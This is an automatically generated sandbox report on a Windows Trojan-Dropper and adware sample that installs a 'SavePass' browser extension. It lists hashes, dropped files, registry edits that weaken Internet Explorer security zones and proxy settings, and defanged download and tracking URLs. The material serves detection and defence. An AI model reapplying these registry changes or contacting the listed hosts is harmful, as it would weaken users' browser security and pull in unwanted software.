Gen.Variant.Adware.Zusy.127996_a0a59f72f2

by malwarelabrobot on March 7th, 2015 in Malware Descriptions.

Trojan-Dropper.Win32.Agent.peok (Kaspersky), Gen:Variant.Adware.Zusy.127996 (B) (Emsisoft), Gen:Variant.Adware.Zusy.127996 (AdAware), mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan-Dropper, Trojan, Adware


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Requires JavaScript enabled!

Summary
Dynamic Analysis
Static Analysis
Network Activity
Map
Strings from Dumps
Removals

MD5: a0a59f72f2bbe495c7b4314a34f5b16c
SHA1: 8757838e8c142167819d54ce4f83796f136eb8c5
SHA256: a76002410292e9b7481b5a7d9465eadb66cda025a8d6c7fcb76e2636a61500b6
SSDeep: 6144:68yWGSreo5tSQDV2AOeJirGX0wLDcDqyvF0N6McKDm6WKR9Ula3:VtHSJFrGX0KDg0N6IDm6/R3
Size: 212384 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2015-02-01 20:46:10
Analyzed on: WindowsXP SP3 32-bit


Summary:

Trojan-Dropper. Trojan program, intended for stealth installation of other malware into user's system.

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

Ywuovtbypk.exe:468
e33a47b.exe:324
%original file name%.exe:228
ping.exe:1948
ping.exe:596
ping.exe:1940
ping.exe:336
ping.exe:460
ping.exe:320
ping.exe:188
ping.exe:496
ping.exe:236

The Trojan injects its code into the following process(es):
No processes have been created.

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process Ywuovtbypk.exe:468 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Tasks\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.job (72 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb4.tmp (659658 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (6 bytes)
%Program Files%\SavePass 1.1\UninstallBrw.exe (8281 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (17420 bytes)
%Program Files%\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe (7547 bytes)
%Program Files%\SavePass 1.1\Uninstall.exe (601 bytes)
%Program Files%\SavePass 1.1\utils.exe (80413 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (76466 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (28288 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\ipgeoapi[1] (40 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (4 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\98225 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsb3.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\nsisos.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\md5dll.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\251151 (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils2.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\InstallerUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp\StdUtils.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsw5.tmp (0 bytes)

The process e33a47b.exe:324 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\History\History.IE5\desktop.ini (159 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (400738 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (11 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WDMRK3AB\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_b (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_c (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_d (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_e (147399 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\11995.bat (407 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (5217358 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (2393 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ugwubcfcj.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\FacebookIsGod.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\Ywuovtbypk.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\21AJ6FMR\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\0VYLS3U5\utility[1].gif (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsc2.tmp\StdUtils.dll (0 bytes)

The process %original file name%.exe:228 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

Registry activity

The process Ywuovtbypk.exe:468 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"Publisher" = "OB"
"UninstallString" = "%Program Files%\SavePass 1.1\Uninstall.exe /fcp=1 /runexe='%Program Files%\SavePass 1.1\UninstallBrw.exe' /url='http://static.gonotiftime.com/notf_sys/index.html' /brwtype='uni' /onerrorexe='%Program Files%\SavePass 1.1\utils.exe' /crregname='SavePass 1.1' /appid='69829' /srcid='001504' /bic='C54C51C1259F4E0794ABE2EFF455B67AIE' /verifier='c86f1da5444bc59351fec9b57e5afa7b' /brwshtoms='15000' /installerversion='1_36_01_22' /statsdomain='http://stats.ourinputdatastorage.com/utility.gif?' /errorsdomain='http://errors.ourinputdatastorage.com/utility.gif?' /monetizationdomain='http://logs.ourinputdatastorage.com/monetization.gif?'"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"CrPublisherId" = "29777"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Tempo]
"(Default)" = "tempo"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"DisplayName" = "SavePass 1.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Crossrider]
"Verifier" = "c86f1da5444bc59351fec9b57e5afa7b"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"DisplayIcon" = "%Program Files%\SavePass 1.1\utils.exe"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Crossrider]
"Bic" = "C54C51C1259F4E0794ABE2EFF455B67AIE"

[HKLM\SOFTWARE\InstalledBrowserExtensions\29777]
"69829" = "SavePass 1.1"

[HKCU\Software\InstalledBrowserExtensions\OB]
"69829" = "SavePass 1.1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Crossrider]
"Bic" = "C54C51C1259F4E0794ABE2EFF455B67AIE"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "33 C9 AC DD 1B F6 C2 52 AD 8A FE 5D 1D 44 87 3F"

[HKLM\SOFTWARE\Crossrider]
"Verifier" = "c86f1da5444bc59351fec9b57e5afa7b"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SavePass 1.1]
"CrAppId" = "69829"
"DisplayVersion" = "1.36.01.22"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\InstalledBrowserExtensions\29777]
"69829" = "SavePass 1.1"

[HKCU\Software\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following registry key(s):

[HKLM\SOFTWARE\Tempo]

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process e33a47b.exe:324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1B 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp]
"11995.bat" = "11995"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\InstalledBrowserExtensions\29777]
"69829" = "SavePass v2.2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A E8 3D CB 24 78 19 E9 9B 7B 5C B4 29 E1 3F 9B"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKCU\Software\InstalledBrowserExtensions\29777]
"69829" = "SavePass v2.2"

[HKCU\Software\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\InstalledBrowserExtensions\29777\Status]
"Installed" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process %original file name%.exe:228 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8E C3 29 8D 82 74 05 92 B8 30 E7 36 92 D9 B5 9B"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\D:]
"e33a47b.exe" = "e33a47b"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process ping.exe:1948 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "0C 77 FD 17 B7 8D 44 DE 70 E1 F9 90 1A EF CD AA"

The process ping.exe:596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "60 E8 9C 56 85 AA C2 8B 90 C1 DE 0C CC 7B A9 DA"

The process ping.exe:1940 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "5F 94 0E D9 68 6B E4 02 14 F9 CC 3F 87 6A A5 62"

The process ping.exe:336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C D7 54 5C 5E FF 86 86 D2 1D 20 33 81 0E 5D C7"

The process ping.exe:460 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F1 BC 8C 76 44 E5 13 A7 81 C1 BF BA 58 4D 70 0C"

The process ping.exe:320 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1E 4B 8E 9B A1 60 70 61 5F 21 60 18 24 8B 40 2A"

The process ping.exe:188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 61 04 DA 01 85 AE F8 B1 44 FF 55 ED E5 DA 77"

The process ping.exe:496 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F8 27 B9 3B 09 2D 54 E8 B9 35 22 67 C4 A8 5C 6A"

The process ping.exe:236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "36 91 1F 9A B0 F3 C7 60 4B 1F F5 66 06 0B E7 35"

Dropped PE files

MD5 File path
72d181e3089d6eee4c1f81c1b13ea88c c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\HAO9C15J\setup[1].exe_a
efc6d4bd8ac2e791549143ed7dc39d39 c:\Program Files\SavePass 1.1\46d65092-ed2d-4231-8c69-b8f9fa5cc9af-5.exe
0374c8fec0166143ddad92c34878adf8 c:\Program Files\SavePass 1.1\Uninstall.exe
6860cb0759479d5b028812cf6a24f9d2 c:\Program Files\SavePass 1.1\UninstallBrw.exe
4b47189b70d27324629908716d40ac7d c:\Program Files\SavePass 1.1\utils.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 347 512 2.72762 bd24fddc16367e94a0e4291cdc13185a
.rdata 8192 366 512 2.4907 ae9775f4ec0f9ea8215ac0d0005da1bf

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

URLs

URL IP
hxxp://errors.crossrider.com/utility.gif?error=start&report=mini_s&ver=1504&action=na&ms_vr=3&clock=0&rnd=20175 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1504&i=10&n=ms_started&rnd=7171 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1504&i=20&n=ms_start_download&rnd=25649 208.85.150.249
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_b
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_e
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_c
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_a
hxxp://cds.c5z6s5a3.hwcdn.net/outil/fuully/styi2/setup.exe_d
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1504&i=30&n=ms_download_success&rnd=7287 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?report=fdata&f=3&c=1504&i=35&n=ms_about_to_exc&rnd=8354 208.85.150.249
hxxp://errors.crossrider.com/utility.gif?error=mem_strt&report=mini_s&ver=1504&action=na&ms_vr=3&clock=7422&rnd=3827 208.85.150.249
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=100&n=init_start_funnel_step_name&rnd=1425597843
hxxp://ipgeoapi.com/ 107.20.198.133
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=started&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgKkkQlbgQ5FMRSd56ddLtowECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1425597843&procruntime=4&rnd=1425597847
hxxp://s3-website-us-east-1.amazonaws.com/installer-error.gif?action=sesamy&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=4&rnd=1425597847
hxxp://cds.c5z6s5a3.hwcdn.net/monetization.gif?event=3&ibic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&campaign=001504&country=ua&app=69829&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1425597843&asw=0_1073750528_-2147483648_0&browser=&rnd=1425597843
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=200&n=init_end_funnel_step_name&rnd=1425597847
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=300&n=deploy_start_funnel_step_name&rnd=1425597848
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1425597849
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=500&n=deploy_notification_start_funnel_step_name&rnd=1425597850
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1425597850
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=700&n=deploy_ch_start_funnel_step_name&rnd=1425597850
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=800&n=deploy_nova_start_funnel_step_name&rnd=1425597850
